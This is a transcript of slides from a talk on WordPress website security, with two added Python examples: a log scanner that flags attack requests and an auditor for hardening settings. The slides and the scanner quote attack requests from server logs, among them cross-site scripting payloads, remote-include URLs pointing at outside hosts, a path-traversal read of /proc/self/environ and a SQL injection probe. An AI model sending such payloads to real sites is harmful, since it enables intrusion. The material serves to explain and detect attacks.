TRANSCRIPT
WordPress Website Security
Trends, Threats, Defenses
04/11/2023
root@web # WHOIS PEREZBOX
Specialization: Website Security, Incident Handling, Log Analysis
Special Interests: Warfare, Weapons, Martial Arts
Tony Perez | @perezbox | @sucuri_security 2
Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M web attacks a Month
300 – 500 websites a day
Signature / Heuristic Based
24/5 - 18/2 operations
Today’s Discussion
Trends, Threats, Defenses
SIMPLE RIGHT?
Trends
Explosion in Web Malicious Links
Chart: Malicious Links, 2011 to 2012, up 600%
Malicious Links?
Diagram: Malicious Links arrive via Social Media, Email Links, Websites and Text Messages
The Web Is The Source
Chart: Known Malware vs. Unknown Malware; 90%
What’s a Good Host?
Chart: Not Infected vs. Infected; 85%
Malware Type Distribution
Chart legend (in slide order):
• Remote iFrame Includes
• Remote JavaScript Includes
• SPAM Injections
• Obfuscated / Encoded JavaScript
• Conditional Redirects
• Defacements
• Other
Percentages shown: 26%, 19%, 16%, 14%, 11%, 4%, 10%
9 Million Unique Domains Scanned
19% Infected
Targeting Environments
Apache / SSH / Email Server
Going deeper than the application layer, targeting the server.
Server polymorphism – a.k.a. changes a lot
Exploiting Forms
• Stick with reputable sources: Gravity Forms, JetPack Forms
• Generating SPAM emails, resource hogs
• IP blacklisting
• Leverage Captchas
Spear Phishing / Phishing Increase
55% of Companies have fallen victim
Search Engine Poisoning (SEP)
Examples: Pharmacy, Payday Loans
Automated Attacks
WP-Admin → Editor / Widgets / Posts → Payload
Access – so easy, yet so weak
Brute Force Attacks
April Brute Force Attacks
Cross-Site Contamination
Diagram: Site 1, Site 2, Site 3 and Site 4 on one server, running WordPress 2.8, 3.5.1, 3.4.2 and 3.0
iFrame Injections
Drive By Downloads
Targeting Java Zero Days
Targeting Mobile Devices
Google is On Fire
Exploiting Trust
Latest Plugin Issues
• W3TC & WP Super Cache Remote Command Execution (RCE) Vulnerability
• WPMM SPAM Injections (Bad Plugin)
• Social Media Widget SPAM Injections (Core Commit)
There’s a Tool for that
• Explosion in the Malware as a Service (MaaS) trade – yes, pay someone to hack for you
• Different tools to break in and generate payloads: brute force and vulnerability exploits, malware payloads
• Blackhole Exploit Kit – today’s market leader (2013 – SophosLabs)
Don’t Worry, Everyone is a Target
Threats
Anatomy of Web Attacks
Recon → Identify → Attack → Sustain
What kind of website do you have?
Use for malware? Burrow into network? Steal data?
Cross-Site Scripting (XSS)
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored / Reflective
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI / LFI)
SQL Injection
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
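As an added example (not from the talk), a small Python scanner that runs signature checks for the three attack classes above (XSS, RFI/LFI, SQL injection) over constructed access-log lines modelled on the slides' samples. The log format, the signatures and the IPs in the constructed lines are this example's assumptions; a 200 response to a flagged request is marked "served" because, as the timthumb lines show, that is the one worth investigating first.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the entries shown in the slides
# (XSS, timthumb remote include, LFI via ../ and /proc/self/environ, SQLi),
# plus one benign request so the scanner has something to ignore.
SAMPLE_LOG = """\
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/demo/timthumb.php?src=http%3A%2F%2Fattacker.example%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Apr/2013:13:10:00 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}|-)')

# Signatures run against the URL-decoded request path.
SIGNATURES = [
    ("xss", re.compile(r"<\s*script|<\s*img[^>]*onerror\s*=", re.I)),
    ("lfi", re.compile(r"(?:\.\./){2,}|/proc/self/environ|\x00")),
    ("rfi", re.compile(r"[?&]src=https?://", re.I)),  # timthumb-style include
    ("sqli", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

def classify(path: str) -> list[str]:
    """Return the signature names matching one request path.
    Decoding twice catches double-encoded payloads; plain paths are unaffected."""
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan(log_text: str) -> list[dict]:
    """Tag suspicious requests; 'served' flags a 200 that deserves a closer look."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            hits.append({"ip": m["ip"], "tags": tags, "status": m["status"],
                         "served": m["status"] == "200", "path": m["path"]})
    return hits
```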
Spear Phishing
Backdoors
What’s all this mean?
• Brand Reputation
• Legal Implications
• Impact to Sales
• Blacklisted by Search Engines
• Blacklisted by Payment Processors
• Worst Day of Your Life
Defenses
Areas to Focus On
Access Control, Vulnerabilities, Hosting, Online Habits, Social Media, Passwords
Manage our own expectations
“It’s about risk reduction… risk will never be zero…”
The Foundation
• We run on WordPress – current version, of course
• Sucuri properties suffer ~125,000 web-based attacks a month on average
• ~4,000 attacks a day; this spikes on occasion
• Doesn’t include server-level attacks
• All flavors of attacks
Defense in Depth Approach
Instead of telling you what you need to do, I’ll just tell you what we do:
• Our philosophy and approach is very simple: complex things break in complex ways
• We focus on the areas that we can immediately control
• We believe in layered defenses
What we do…for websites
Stay Current
IP Whitelisting
Two Factor Authentication
Strong / Unique Password
Web Application Firewall
What we do…for Servers
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
My Personal Configurations.. Tools..
Category | Tool | Type
Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
Prevention – Access Control | Sucuri CloudProxy | Service
Detection | Sucuri Monitoring | Service
Remediation | Sucuri | Service
Password Management | 1Password / LastPass | Application
Host-based Intrusion Detection System | OSSEC | Application
Access Control Enforcement | Login Secure Solutions | Plugin
Two-Factor Authentication | Google Authenticator | Plugin
Application Auditing | Sucuri Premium | Plugin
Backups | BackupBuddy | Plugin
My Personal Configurations… cntd..
Category | Location | Type
Disable Theme / Plugin Editor | wp-config.php | Preventive measure
Disable PHP execution | .htaccess – uploads / images / wp-includes / etc.. | Preventive measure
Permissions | Directories 755 / Files 644 | Preventive measure
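An added example, not from the talk: a Python audit of the three preventive measures in the table above, run against a constructed mini WordPress tree once sloppy and once hardened. It assumes DISALLOW_FILE_EDIT is the wp-config.php switch behind "disable theme / plugin editor", and a FilesMatch deny rule in uploads and wp-includes as the .htaccess form of "disable PHP execution".

```python
import re
import stat
import tempfile
from pathlib import Path

# Assumptions of this example: DISALLOW_FILE_EDIT is the wp-config.php setting that
# disables the theme/plugin editor, and uploads/wp-includes each get an .htaccess denying *.php.
NO_PHP_DIRS = ("wp-content/uploads", "wp-includes")
PHP_DENY = '<FilesMatch "\\.php$">\nRequire all denied\n</FilesMatch>\n'
EDIT_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

def audit(root) -> list[str]:
    """Report deviations from the three preventive measures in the table above."""
    root, findings = Path(root), []
    cfg = root / "wp-config.php"
    if not cfg.is_file() or not EDIT_RE.search(cfg.read_text()):
        findings.append("wp-config.php: DISALLOW_FILE_EDIT not set to true")
    for rel in NO_PHP_DIRS:
        ht = root / rel / ".htaccess"
        text = ht.read_text().lower() if ht.is_file() else ""
        if ".php" not in text or not re.search(r"deny|denied", text):
            findings.append(f"{rel}/.htaccess: no rule denying PHP execution")
    for p in root.rglob("*"):
        want = 0o755 if p.is_dir() else 0o644
        mode = stat.S_IMODE(p.stat().st_mode)
        if mode != want:
            findings.append(f"{p.relative_to(root)}: mode {mode:o}, want {want:o}")
    return findings

def build_demo(root, hardened: bool) -> None:
    root = Path(root)  # constructed mini WordPress tree, sloppy or hardened
    for rel in ("wp-content/uploads/photo.jpg", "wp-includes/functions.php"):
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text("x")
    editor = "define('DISALLOW_FILE_EDIT', true);\n" if hardened else ""
    (root / "wp-config.php").write_text("<?php\n" + editor)
    if hardened:
        for rel in NO_PHP_DIRS:
            (root / rel / ".htaccess").write_text(PHP_DENY)
    for p in root.rglob("*"):  # group/world-writable when sloppy, 755/644 when hardened
        good = 0o755 if p.is_dir() else 0o644
        p.chmod(good if hardened else good | 0o022)

def demo() -> tuple[int, int]:
    counts = []  # findings for the sloppy tree, then for the hardened one
    for hardened in (False, True):
        with tempfile.TemporaryDirectory() as d:
            build_demo(d, hardened)
            counts.append(len(audit(d)))
    return tuple(counts)
```

The sloppy tree yields one editor finding, two missing .htaccess rules and six permission findings; the hardened tree yields none.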
Hosting
• Don’t know what you’re doing?
• Go with a managed host…
Managed Hosting Options
Doesn’t mean you won’t ever get infected.
Passwords
Complex . Long . Unique . Esoteric
“CLUE”
Epic Fail
USERNAMES | Count
admin | 652,911
test | 10,173
administrator | 8,992
Admin | 8,921
root | 2,495
PASSWORDS | Count
admin | 16,798
123456 | 10,880
666666 | 9,727
111111 | 9,106
12345678 | 7,882
qwerty | 7,717
1234567 | 7,295
Notable Plugins
Access | Login Secure Solution, Stealth Login, Limit Login
Scanning | WordFence, Anti-Malwatch
Defense in Depth | Better WP Security, BulletProof Security
Vulnerabilities | MVIS Security Center
Notable Resources
Name | Tool
Sucuri Blog | http://blog.sucuri.net
Sucuri TV | http://sucuri.tv
WordPress Forum – Hacked | http://wordpress.org/tags/hacked
WordPress Forum – Malware | http://wordpress.org/tags/malware
Badware Busters | https://badwarebusters.org
Perishable Press | http://perishablepress.com/category/web-design/security/
Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
Thanks